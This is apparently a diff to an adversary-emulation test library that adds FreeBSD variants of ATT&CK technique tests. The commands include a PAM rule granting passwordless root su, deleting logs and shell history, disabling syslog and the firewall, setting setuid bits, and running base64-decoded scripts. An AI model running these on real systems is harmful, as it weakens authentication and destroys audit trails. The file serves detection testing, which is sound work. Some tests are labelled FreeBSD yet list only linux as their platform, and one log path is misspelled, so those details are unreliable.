@@ -115326,7 +115222,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'poweroff
@@ -115340,7 +115235,7 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'poweroff -r 3
@@ -117508,7 +117403,7 @@ initial-access:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -117549,7 +117444,7 @@ initial-access:
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -117591,7 +117486,7 @@ initial-access:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -118137,7 +118032,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
input_file:
description: Test file to upload
@@ -118316,7 +118210,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
domain:
description: target SSH domain
@@ -118338,7 +118231,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
user_name:
description: username for domain
@@ -118738,7 +118630,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
file_name:
description: File name
@@ -119022,7 +118913,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
executor:
steps: |
1. Victim System Configuration:
@@ -119069,7 +118959,6 @@ exfiltration:
'
supported_platforms:
- freebsd
- linux
executor:
steps: "1. On the adversary machine run the below command.\n\n tshark -f
@@ -119253,7 +119142,7 @@ exfiltration:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
+2808 -136
View File
@@ -669,6 +669,36 @@ defense-evasion:
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
@@ -921,9 +951,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -945,9 +974,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -969,9 +997,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -993,9 +1020,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -1070,9 +1096,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
owner:
description: Username of desired owner
@@ -1127,6 +1152,24 @@ defense-evasion:
'
name: sh
- name: chflags - Remove immutable file attribute
auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709
description: |
Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- linux
input_arguments:
file_to_modify:
description: Path of the file
type: path
default: "/tmp/T1222.002.txt"
executor:
command: |
touch #{file_to_modify}
chflags simmutable #{file_to_modify}
chflags nosimmutable #{file_to_modify}
name: sh
- name: Chmod through c script
auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab
description: 'chmods a file using a c script
@@ -1158,6 +1201,36 @@ defense-evasion:
executor:
command: "#{compiled_file} /tmp/ T1222002\n"
name: sh
- name: Chmod through c script (freebsd)
auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e
description: 'chmods a file using a c script
'
supported_platforms:
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'cc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
'
executor:
command: "#{compiled_file} /tmp/ T1222002\n"
name: sh
- name: Chown through c script
auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389
description: 'chowns a file to root using a c script
@@ -1192,6 +1265,37 @@ defense-evasion:
'
name: sh
elevation_required: true
- name: Chown through c script (freebsd)
auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e
description: 'chowns a file to root using a c script
'
supported_platforms:
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/chown.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002own"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'cc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
'
executor:
command: "#{compiled_file} #{source_file}\n"
name: sh
elevation_required: true
T1216.001:
technique:
x_mitre_platforms:
@@ -2037,6 +2141,27 @@ defense-evasion:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
- name: Sudo usage (freebsd)
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
@@ -2053,6 +2178,31 @@ defense-evasion:
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Unlimited sudo cache timeout (freebsd)
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
- name: Disable tty_tickets for sudo caching
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
@@ -2068,6 +2218,30 @@ defense-evasion:
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching (freebsd)
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
sudo visudo -c -f /usr/local/etc/sudoers
T1578:
technique:
x_mitre_platforms:
@@ -2602,7 +2776,6 @@ defense-evasion:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
test_message:
description: Test message to echo out to the screen
@@ -3262,6 +3435,20 @@ defense-evasion:
command: |
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
- name: Detect Virtualization Environment (FreeBSD)
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
description: |
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
Environment detected"; fi
'
T1070.002:
technique:
x_mitre_platforms:
@@ -3347,6 +3534,75 @@ defense-evasion:
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: rm -rf
auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9
description: 'Delete messages and security logs
'
supported_platforms:
- linux
executor:
command: |
rm -rf /var/log/messages
rm -rf /var/log/security
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility (freebsd)
auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c
description: 'This test truncates the system log files using the truncate utility
with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
the file content
'
supported_platforms:
- linux
executor:
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
--size=0 /var/log/security #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054
description: 'The first sub-test truncates the log file to zero bytes via /dev/null
and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
using cat utility
'
supported_platforms:
- linux
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: Overwrite FreeBSD system log via echo utility
auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9
description: 'This test overwrites the contents of system log file with an empty
string using echo utility
'
supported_platforms:
- linux
executor:
command: 'echo '''' > /var/log/messages
'
name: sh
elevation_required: true
- name: Delete system log files via unlink utility (freebsd)
auto_generated_guid: 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
description: 'This test deletes the messages log file using unlink utility
'
supported_platforms:
- linux
executor:
command: 'unlink /var/log/messages
'
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
description: 'The first sub-test deletes the journal files using rm utility
@@ -4253,6 +4509,18 @@ defense-evasion:
executor:
command: 'rm ~/.bash_history
'
name: sh
- name: Clear sh history (rm)
auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
description: 'Clears sh history via rm
'
supported_platforms:
- linux
executor:
command: 'rm ~/.sh_history
'
name: sh
- name: Clear Bash history (echo)
@@ -4265,6 +4533,18 @@ defense-evasion:
executor:
command: 'echo "" > ~/.bash_history
'
name: sh
- name: Clear sh history (echo)
auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
description: 'Clears sh history via echo
'
supported_platforms:
- linux
executor:
command: 'echo "" > ~/.sh_history
'
name: sh
- name: Clear Bash history (cat dev/null)
@@ -4278,6 +4558,18 @@ defense-evasion:
executor:
command: 'cat /dev/null > ~/.bash_history
'
name: sh
- name: Clear sh history (cat dev/null)
auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
description: 'Clears sh history via cat /dev/null
'
supported_platforms:
- linux
executor:
command: 'cat /dev/null > ~/.sh_history
'
name: sh
- name: Clear Bash history (ln dev/null)
@@ -4291,6 +4583,18 @@ defense-evasion:
executor:
command: 'ln -sf /dev/null ~/.bash_history
'
name: sh
- name: Clear sh history (ln dev/null)
auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
description: 'Clears sh history via a symlink to /dev/null
'
supported_platforms:
- linux
executor:
command: 'ln -sf /dev/null ~/.sh_history
'
name: sh
- name: Clear Bash history (truncate)
@@ -4303,6 +4607,18 @@ defense-evasion:
executor:
command: 'truncate -s0 ~/.bash_history
'
name: sh
- name: Clear sh history (truncate)
auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
description: 'Clears sh history via truncate
'
supported_platforms:
- linux
executor:
command: 'truncate -s0 ~/.sh_history
'
name: sh
- name: Clear history of a bunch of shells
@@ -4320,6 +4636,22 @@ defense-evasion:
export HISTFILESIZE=0
history -c
name: sh
- name: Clear history of a bunch of shells (freebsd)
auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
supported_platforms:
- linux
executor:
command: |
unset HISTFILE
unset histfile
export HISTFILESIZE=0
export HISTSIZE=0
history -c
name: sh
- name: Clear and Disable Bash History Logging
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
description: 'Clears the history and disable bash history logging of the current
@@ -4379,6 +4711,33 @@ defense-evasion:
'
cleanup_command: 'userdel -f testuser1
'
name: sh
- name: Disable sh History Logging with SSH -T (freebsd)
auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
keeps the ssh client from catching a proper TTY, which is what usually gets
logged on lastlog
'
supported_platforms:
- linux
dependencies:
- description: 'Install sshpass and create user account used for excuting
'
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
>/dev/null)\n"
get_prereq_command: |
pw useradd testuser1 -g wheel -s /bin/sh
echo 'pwd101!' | pw mod user testuser1 -h 0
(which pkg && pkg install -y sshpass)
executor:
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
'
cleanup_command: 'rmuser -y testuser1
'
name: sh
T1202:
@@ -4562,7 +4921,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -4600,7 +4958,6 @@ defense-evasion:
description: "Use Perl to decode a base64-encoded text string and echo it to
the console \n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -4661,6 +5018,80 @@ defense-evasion:
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
- name: Base64 decoding with shell utilities (freebsd)
auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d
description: 'Use common shell utilities to decode a base64-encoded text string
and echo it to the console
'
supported_platforms:
- linux
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(echo '#{message}' | b64encode -r -)
printf $ENCODED | b64decode -r
echo $ENCODED | b64decode -r
echo $(echo $ENCODED) | b64decode -r
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
- name: FreeBSD b64encode Shebang in CLI
auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac
description: "Using b64decode shell scripts that have Shebang in them. This
is commonly how attackers obfuscate passing and executing a shell script.
Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
for it. \n"
supported_platforms:
- linux
input_arguments:
bash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
dash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
fish_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
sh_encoded:
description: Encoded
type: string
default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
dependencies:
- description: 'b64decode must be present
'
prereq_command: 'which b64decode
'
get_prereq_command: 'echo "please install b64decode"
'
executor:
name: sh
elevation_required: false
command: |
echo #{bash_encoded} | b64decode -r | sh
echo #{dash_encoded} | b64decode -r | sh
echo #{fish_encoded} | b64decode -r | sh
echo #{sh_encoded} | b64decode -r | sh
- name: Hex decoding with shell utilities
auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973'
description: 'Use common shell utilities to decode a hex-encoded text string
@@ -4668,7 +5099,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5579,7 +6009,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5611,7 +6040,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5646,7 +6074,6 @@ defense-evasion:
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5673,7 +6100,6 @@ defense-evasion:
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -6500,6 +6926,34 @@ defense-evasion:
cleanup_command: |
ufw enable
ufw status verbose
- name: Stop/Start Packet Filter
auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7
description: 'Stop the Packet Filter if installed.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pfctl is installed on the machine.
'
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
service pf stop
service pf disable
cleanup_command: |
service pf enable
service pf start
service pf status
- name: Stop/Start UFW firewall systemctl
auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1
description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
@@ -6581,6 +7035,33 @@ defense-evasion:
cleanup_command: |
{ echo y; echo response; } | ufw delete 1
ufw status numbered
- name: Add and delete Packet Filter rules
auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b
description: "Add and delete a rule on the Packet Filter (PF) if installed and
enabled. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pf is installed on the machine and enabled.
'
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: |
echo "anchor pf-rules >> /etc/pf.conf"
pfctl -f /etc/pf.conf
executor:
name: sh
elevation_required: true
command: |
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules
cleanup_command: |
pfctl -a pf-rules -F rules
sed -i "" '/anchor pf-rules/d'
pfctl -f /etc/pf.conf
- name: Edit UFW firewall user.rules file
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
@@ -7620,9 +8101,8 @@ defense-evasion:
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -7655,9 +8135,8 @@ defense-evasion:
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -8582,6 +9061,32 @@ defense-evasion:
sudo rm /tmp/hello.c
name: sh
elevation_required: true
- name: Make and modify binary from C source (freebsd)
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
description: 'Make, change owner, and change file attributes on a C source code
file
'
supported_platforms:
- linux
input_arguments:
payload:
description: hello.c payload
type: path
default: PathToAtomicsFolder/T1548.001/src/hello.c
executor:
command: |
cp #{payload} /tmp/hello.c
chown root /tmp/hello.c
make /tmp/hello
chown root /tmp/hello
chmod u+s /tmp/hello
/tmp/hello
cleanup_command: |
rm /tmp/hello
rm /tmp/hello.c
name: sh
elevation_required: true
- name: Set a SetUID flag on file
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in FreeBSD.
@@ -8605,6 +9110,28 @@ defense-evasion:
'
name: sh
elevation_required: true
- name: Set a SetUID flag on file (freebsd)
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
description: 'This test sets the SetUID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod u+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
@@ -8628,6 +9155,28 @@ defense-evasion:
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file (freebsd)
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
description: 'This test sets the SetGID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod g+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
description: |
@@ -8681,7 +9230,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -4000
@@ -8695,7 +9243,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -2000
@@ -9555,6 +10102,27 @@ defense-evasion:
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: Auditing Configuration Changes on FreeBSD Host
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: 'Emulates modification of auditd configuration files
'
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: 'echo ''#art_test_1562_006_1'' >> /etc/security/#{auditd_config_file_name}
'
cleanup_command: 'sed -i "" ''/#art_test_1562_006_1/d'' /etc/security/#{auditd_config_file_name}
'
name: sh
elevation_required: true
- name: Logging Configuration Changes on Linux Host
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: 'Emulates modification of syslog configuration.
@@ -9598,6 +10166,29 @@ defense-evasion:
fi
name: bash
elevation_required: true
- name: Logging Configuration Changes on FreeBSD Host
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: 'Emulates modification of syslog configuration.
'
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
T1562.007:
technique:
modified: '2023-04-15T00:25:36.502Z'
@@ -11401,6 +11992,23 @@ defense-evasion:
export HISTCONTROL=ignoreboth
#{evil_command}
name: sh
- name: Disable history collection (freebsd)
auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306
description: 'Disables history collection in shells
'
supported_platforms:
- linux
input_arguments:
evil_command:
description: Command to run after shell history collection is disabled
type: string
default: whoami
executor:
command: |
export HISTSIZE=0
#{evil_command}
name: sh
- name: Mac HISTCONTROL
auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
description: "The HISTCONTROL variable is set to ignore (not write to the history
@@ -11481,6 +12089,25 @@ defense-evasion:
# -> $HISTFILESIZE is zero
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
'
- name: Setting the HISTSIZE environment variable
auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814
description: |
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $HISTSIZE
export HISTSIZE=0
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; fi
# -> $HISTSIZE is zero
cleanup_command: 'export HISTSIZE=100
'
- name: Setting the HISTFILE environment variable
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
@@ -11501,6 +12128,25 @@ defense-evasion:
# -> $HISTFILE is /dev/null
cleanup_command: 'export HISTFILE=$(echo $TEST)
'
- name: Setting the HISTFILE environment variable (freebsd)
auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67
description: |
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $HISTFILE
export HISTFILE="/dev/null"
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
# -> $HISTFILE is /dev/null
cleanup_command: 'export HISTFILE=~/.sh_history
'
- name: Setting the HISTIGNORE environment variable
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
@@ -12614,6 +13260,22 @@ defense-evasion:
cleanup_command: "#{cleanup_command}\n"
name: sh
elevation_required: true
- name: Disable syslog (freebsd)
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
description: 'Disables syslog collection
'
supported_platforms:
- linux
executor:
command: |
service syslogd stop
sysrc syslogd_enable="NO"
cleanup_command: |
sysrc syslogd_enable="YES"
service syslogd start
name: sh
elevation_required: true
- name: Disable Cb Response
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
description: 'Disable the Cb Response service
@@ -12732,7 +13394,6 @@ defense-evasion:
as an additional \npayload to the compromised host and to make sure that there
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
supported_platforms:
- freebsd
- linux
executor:
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
@@ -13398,6 +14059,37 @@ defense-evasion:
/tmp/art.sh
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
name: sh
- name: Decode base64 Data into Script
auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c
description: "Creates a base64-encoded data file and decodes it into an executable
shell script\n\nUpon successful execution, sh will execute art.sh, which is
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
uname -v\n"
supported_platforms:
- linux
input_arguments:
shell_command:
description: command to encode
type: string
default: echo Hello from the Atomic Red Team && uname -v
dependency_executor_name: sh
dependencies:
- description: 'encode the command into base64 file
'
prereq_command: 'exit 1
'
get_prereq_command: 'echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat
'
executor:
command: |
cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
name: sh
T1556.006:
technique:
modified: '2023-02-09T14:18:59.080Z'
@@ -14047,7 +14739,6 @@ defense-evasion:
Upon successful execution, sh is renamed to `crond` and executed.
supported_platforms:
- freebsd
- linux
executor:
command: |
@@ -14679,6 +15370,33 @@ defense-evasion:
update-ca-trust
name: sh
elevation_required: true
- name: Install root CA on FreeBSD
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
